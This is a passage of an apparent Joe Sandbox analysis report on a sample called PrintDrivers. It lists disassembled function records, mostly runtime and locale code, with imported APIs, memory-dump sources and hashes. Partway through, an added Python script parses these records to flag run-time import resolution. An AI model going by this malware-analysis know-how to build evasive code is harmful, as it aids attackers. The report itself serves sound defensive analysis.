                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 171376306877ebd52e295339293babe4f7dc9c1121a35171a5a264bea680bb03
                                                                    • Instruction ID: 30d9b07324b990d8d799c6f41b130a89d077b9aeae548ba0ab1bd2e342923727
                                                                    • Opcode Fuzzy Hash: 171376306877ebd52e295339293babe4f7dc9c1121a35171a5a264bea680bb03
                                                                    • Instruction Fuzzy Hash: 4811A332A01631EBDF225B68AC49B6EBF9CBF12760F250560E915EB280DB70ED04D6D4
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(F3F544E4,F3F544E4,?,?,00000000,005C6641,000000FF), ref: 00585FCB
                                                                      • Part of subcall function 005A4B23: EnterCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B2E
                                                                      • Part of subcall function 005A4B23: LeaveCriticalSection.KERNEL32(005E0D24,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4B6B
                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00585F90
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00585F97
                                                                      • Part of subcall function 005A4AD9: EnterCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4AE3
                                                                      • Part of subcall function 005A4AD9: LeaveCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4B16
                                                                      • Part of subcall function 005A4AD9: RtlWakeAllConditionVariable.NTDLL ref: 005A4B8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 2056477612-3789238822
                                                                    • Opcode ID: fe94c5da21f8a9f8e1b5f31f8de98886d8be41881bb6d70e09e1c619fa879f71
                                                                    • Instruction ID: daca7f6024492a5f3184353af5bb266429728ff9a127db127dc4369e3b6e42e7
                                                                    • Opcode Fuzzy Hash: fe94c5da21f8a9f8e1b5f31f8de98886d8be41881bb6d70e09e1c619fa879f71
                                                                    • Instruction Fuzzy Hash: A41124B2904A88DFDB20CF94DD49FA9BBB8F714720F04022AEC16A7780E774A904CB54
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,005B3CBB,00588D68,?,005B3C83,?,?,00588D68), ref: 005B3CDB
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B3CEE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,005B3CBB,00588D68,?,005B3C83,?,?,00588D68), ref: 005B3D11
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: e99916710e7d4df3d8d8bd1c10f256e84417096e441fff83ea7c55d6ffd0f370
                                                                    • Instruction ID: 77ed65314edb674d2575855c18b11ff73b1c8b0087460ac78b1c3f7508209db6
                                                                    • Opcode Fuzzy Hash: e99916710e7d4df3d8d8bd1c10f256e84417096e441fff83ea7c55d6ffd0f370
                                                                    • Instruction Fuzzy Hash: 7EF01C35A00619FFDB119B91DD0EFDE7E68FF20B96F5440A4A901B21A0DB719F44EB90
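The function records in this listing share one layout: an APIs block of imports with their stack arguments and call-site address, optional "Part of subcall function" entries, and a Similarity block whose String ID field carries the string constants the plugin saw next to those calls. The following Python, added here as an example and not code from Joe Sandbox, parses that layout and flags functions that pair a module lookup (GetModuleHandle*/LoadLibrary*) with GetProcAddress, which is the run-time import resolution behind the "Extensive use of GetProcAddress" signature in this report. SAMPLE_RECORDS copies three records from the PrintDrivers listing above (the GetTempFileNameW/URL function, the IsWow64Process lookup, and the mscoree.dll/CorExitProcess lookup), trimmed to the APIs and Similarity lines; the regexes, the record model, the loader/GetProcAddress pairing rule and the split of String ID entries into module hints and export names are this example's own assumptions, not the sandbox's logic.

```python
"""Parse Joe Sandbox function records and flag run-time import resolution.

Added example, not Joe Sandbox code. SAMPLE_RECORDS copies three records from
this report's PrintDrivers listing (process 4, image base 0x580000), trimmed
to their APIs and Similarity lines. Regexes, record model and flagging rule
are assumptions of this example.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_RECORDS = """\
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,F3F544E4), ref: 00583174
• MoveFileW.KERNEL32(?,00000000), ref: 00583402
• DeleteFileW.KERNEL32(?), ref: 0058344A
  • Part of subcall function 00582D40: LocalFree.KERNEL32(?,F3F544E4,?,?,005C5A40,000000FF,?,005811E2,F3F544E4,?,?,005C5A75,000000FF), ref: 00582D91
Similarity
• API ID: File$DeleteFreeLocalMoveNameTemp
• String ID: URL$url
• Instruction Fuzzy Hash: 13C15970914669DACB24EF28CC9CBDDBBB4BF54704F1046D9D809A7291EB74AB84CF90
APIs
• GetCurrentProcess.KERNEL32(F3F544E4,F3F544E4,?,?,00000000,005C6641,000000FF), ref: 00585FCB
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00585F90
• GetProcAddress.KERNEL32(00000000), ref: 00585F97
Similarity
• API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
• String ID: IsWow64Process$kernel32
• Instruction Fuzzy Hash: A41124B2904A88DFDB20CF94DD49FA9BBB8F714720F04022AEC16A7780E774A904CB54
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,005B3CBB,00588D68,?,005B3C83,?,?,00588D68), ref: 005B3CDB
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B3CEE
• FreeLibrary.KERNEL32(00000000,?,?,005B3CBB,00588D68,?,005B3C83,?,?,00588D68), ref: 005B3D11
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 7EF01C35A00619FFDB119B91DD0EFDE7E68FF20B96F5440A4A901B21A0DB719F44EB90
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "• [Part of subcall function ADDR: ]Name.MODULE(args)[, ref: ADDR]" (assumed layout)
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,? ref: (?P<ref>[0-9A-F]{8}))?\s*$"
)
# "• Key: value" lines of the other sections; key ends at the first colon.
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[^:]+?):\s*(?P<val>.*?)\s*$")
LOADERS = ("GetModuleHandle", "LoadLibrary")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: Optional[str]
    subcall_of: Optional[str]   # callee address when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # later duplicate keys overwrite earlier ones

    @property
    def api_names(self):
        """Imports called directly by this function; subcall entries excluded."""
        return {c.name for c in self.calls if c.subcall_of is None}

    @property
    def strings(self):
        """The '$'-separated String ID field as a list, empty parts dropped."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_records(text):
    """Split the listing into records; each record opens with its APIs heading."""
    records, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped in SECTIONS:
            section = stripped
            if section == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:        # a partial record before the first APIs heading
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"]
    return records


def is_module_hint(s):
    """Assumed: strings naming a DLL are loader arguments, everything else an export name."""
    return s.lower().endswith(".dll") or s.lower() in {"kernel32", "ntdll", "user32", "advapi32"}


def dynamic_import_sites(records):
    """Functions that pair a module lookup with GetProcAddress (direct calls only)."""
    hits = []
    for rec in records:
        direct = [c for c in rec.calls if c.subcall_of is None]
        gpa = [c for c in direct if c.name == "GetProcAddress"]
        loaders = [c for c in direct if c.name.startswith(LOADERS)]
        if not gpa or not loaders:
            continue
        hits.append({
            "ref": gpa[0].ref,
            "loader": loaders[0].name,
            "modules": [s for s in rec.strings if is_module_hint(s)],
            "exports": [s for s in rec.strings if not is_module_hint(s)],
        })
    return hits


if __name__ == "__main__":
    for hit in dynamic_import_sites(parse_records(SAMPLE_RECORDS)):
        print(f"{hit['ref']}: {hit['loader']} + GetProcAddress -> {hit['modules']} {hit['exports']}")
```

Run against the full listing, the parser skips the partial record that precedes the first APIs heading, and repeated keys such as the several Associated lines of a Memory Dump Source block keep only the last value. The two functions it flags here resolve IsWow64Process from kernel32 and CorExitProcess from mscoree.dll, both export lookups that only succeed when the module and export exist, which is exactly why such code resolves them at run time rather than importing them statically.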
                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,005A4B48,00000064), ref: 005A4BCE
                                                                    • LeaveCriticalSection.KERNEL32(005E0D24,?,?,005A4B48,00000064,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4BD8
                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,005A4B48,00000064,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4BE9
                                                                    • EnterCriticalSection.KERNEL32(005E0D24,?,005A4B48,00000064,?,?,?,005824B6,005E1620,F3F544E4,?,?,005C5B3D,000000FF), ref: 005A4BF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID: $^
                                                                    • API String ID: 3269011525-4185404816
                                                                    • Opcode ID: 87a0bdf0ef542fa28d4bc9d42bb1d53111feff6340d7ae9227b8d16dfe40dabc
                                                                    • Instruction ID: dfe6150d874a2b1abd94289dbce94f762eee6bc60794f9539fe4beeb5ca36ac7
                                                                    • Opcode Fuzzy Hash: 87a0bdf0ef542fa28d4bc9d42bb1d53111feff6340d7ae9227b8d16dfe40dabc
                                                                    • Instruction Fuzzy Hash: D4E06D32501568FFCE061BD1ED0CE8D3F64FB19B11B006060F949661A0CAA16894ABE1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf$FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 2429749586-0
                                                                    • Opcode ID: 8fd5d730a6c1c7ff15bc0b820917f50cc783cae4340aabe4b791fa5a9abe1d50
                                                                    • Instruction ID: dfec0ef6074a2b2b3f37cfb57f8939de7bfa5ac9d68d388175583de93acce75b
                                                                    • Opcode Fuzzy Hash: 8fd5d730a6c1c7ff15bc0b820917f50cc783cae4340aabe4b791fa5a9abe1d50
                                                                    • Instruction Fuzzy Hash: 38C1AD71A00209AFDF15EFA4DC55BAEBBB9FF49300F04462AF811AB281D735A954CB90
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 005B7BA6
                                                                    • __alloca_probe_16.LIBCMT ref: 005B7C6C
                                                                    • __freea.LIBCMT ref: 005B7CD8
                                                                      • Part of subcall function 005B68F8: HeapAlloc.KERNEL32(00000000,00000001,00581AC0,?,005A5BEE,00581AC2,00581AC0,?,?,?,0058F95C,00581AC4,00581AC4), ref: 005B692A
                                                                    • __freea.LIBCMT ref: 005B7CE1
                                                                    • __freea.LIBCMT ref: 005B7D04
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: 04844912e2e8dcd25d6b72e93009d4619361c919d9afafba475d5fc0fe150f6d
                                                                    • Instruction ID: 05e247e998b96890a225b5a06a0484e26c669c89640830572fb322c6cd45f259
                                                                    • Opcode Fuzzy Hash: 04844912e2e8dcd25d6b72e93009d4619361c919d9afafba475d5fc0fe150f6d
                                                                    • Instruction Fuzzy Hash: 6151BF7260421EAFEB215F649C46EFB3FA9FBC9750F254529FD04AB140EB70ED0086A0
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005A3B90
                                                                    • __alloca_probe_16.LIBCMT ref: 005A3BBC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005A3BFB
                                                                    • __alloca_probe_16.LIBCMT ref: 005A3C6F
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005A3CD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16
                                                                    • String ID:
                                                                    • API String ID: 2135360126-0
                                                                    • Opcode ID: e8b27180e7ea00a479015f719d9f322bd2e20b767665617216780ee9ccc0f729
                                                                    • Instruction ID: 0c0ba32e32bbe3861436acfa457ac5ddeb5b0386464ce8a474c00a3fa7088e60
                                                                    • Opcode Fuzzy Hash: e8b27180e7ea00a479015f719d9f322bd2e20b767665617216780ee9ccc0f729
                                                                    • Instruction Fuzzy Hash: 7051C37290020AABDF209F65CC59FAF7FA9FF86768F254425F904A6150E731CE14CBA0
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058AF7D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058AFA0
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AFC8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058B02D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058B057
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 27c2298f9fa4a70f569cb106b6d8b6d7156954dec7c37a42a11148f3adbcd265
                                                                    • Instruction ID: 99b1369f639df251ec2a1a88af2b84927193f8fb583cadf337a245e6e6e0b1fd
                                                                    • Opcode Fuzzy Hash: 27c2298f9fa4a70f569cb106b6d8b6d7156954dec7c37a42a11148f3adbcd265
                                                                    • Instruction Fuzzy Hash: 7531F331D00255DFDB11EF54C989BAEBFB4FF14314F284259E854AB292D731AE06CB81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00590ED3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00590EDD
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • numpunct.LIBCPMT ref: 00590F17
                                                                    • std::_Facet_Register.LIBCPMT ref: 00590F2E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00590F4E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID:
                                                                    • API String ID: 743221004-0
                                                                    • Opcode ID: 4f8a7119fabc06fe8e33613c4602ae7e5588cfe02a7c3b5fe248ad6262e0ac7f
                                                                    • Instruction ID: ee8d3f97ae0d36f270cbcb8fc890fa46eeae2ebf574b3d063a862933bb7260c5
                                                                    • Opcode Fuzzy Hash: 4f8a7119fabc06fe8e33613c4602ae7e5588cfe02a7c3b5fe248ad6262e0ac7f
                                                                    • Instruction Fuzzy Hash: 461170359006169FCF15EBA0C859ABE7F61FFC4320F655948F915AB2D1DF709E068B80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596046
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596050
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • messages.LIBCPMT ref: 0059608A
                                                                    • std::_Facet_Register.LIBCPMT ref: 005960A1
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005960C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID:
                                                                    • API String ID: 2750803064-0
                                                                    • Opcode ID: 3287ccdb12de24f13d02f75fc969129fda83f6714a86a291eaace1b27499d921
                                                                    • Instruction ID: ec52f19b94c9f0c586e27c1fbc19d0774e10f4d8c1c73e9b1a149c1632db8afe
                                                                    • Opcode Fuzzy Hash: 3287ccdb12de24f13d02f75fc969129fda83f6714a86a291eaace1b27499d921
                                                                    • Instruction Fuzzy Hash: 1001AD3590011A9BCF09EBA0884DABE7FA5FFC4320F644548F810AB291DFB49E09CB91
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059632F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596339
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 00596373
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059638A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005963AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 9f24b02af563c444c00dfc678e154cdbfd7d41ee83fda585fc08bc7d6e54bb27
                                                                    • Instruction ID: 5aa17ce69c5863bc45ef03fc9a6b0d7002292d622a436bfe387231e206a42508
                                                                    • Opcode Fuzzy Hash: 9f24b02af563c444c00dfc678e154cdbfd7d41ee83fda585fc08bc7d6e54bb27
                                                                    • Instruction Fuzzy Hash: 6301AD3590011A9BCF05EBA0C889ABE7FB1FFC4320F240508E850AB2D1DF709E49DB81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005963C4
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005963CE
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 00596408
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059641F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0059643F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 0be98de37285c8c795d3f9712c47959d464c888563689ee193dc60f1f680e352
                                                                    • Instruction ID: 3a9cca744e6be4e583bc34bdeee1c596ee191c303c41c5be42de0c88080a78da
                                                                    • Opcode Fuzzy Hash: 0be98de37285c8c795d3f9712c47959d464c888563689ee193dc60f1f680e352
                                                                    • Instruction Fuzzy Hash: A10161359002169BCF05FBE48889ABE7FB1FF84320F544509E855AB292DF719E098B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596459
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596463
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 0059649D
                                                                    • std::_Facet_Register.LIBCPMT ref: 005964B4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005964D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 5480e7f6054c601638939b36df0bdb5310172aee309310c988e08ddf72cd9d93
                                                                    • Instruction ID: 02a319c85a9b95ff8c6473cb25146c18e622266a90ea0e6d20975a9e7dc88886
                                                                    • Opcode Fuzzy Hash: 5480e7f6054c601638939b36df0bdb5310172aee309310c988e08ddf72cd9d93
                                                                    • Instruction Fuzzy Hash: B001A1359001269BCF05EBA0C959ABD7FA1FFC4710F154508E8196B291DF709E09CB80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005964EE
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005964F8
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • moneypunct.LIBCPMT ref: 00596532
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596549
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596569
                                                                    Memory Dump Source
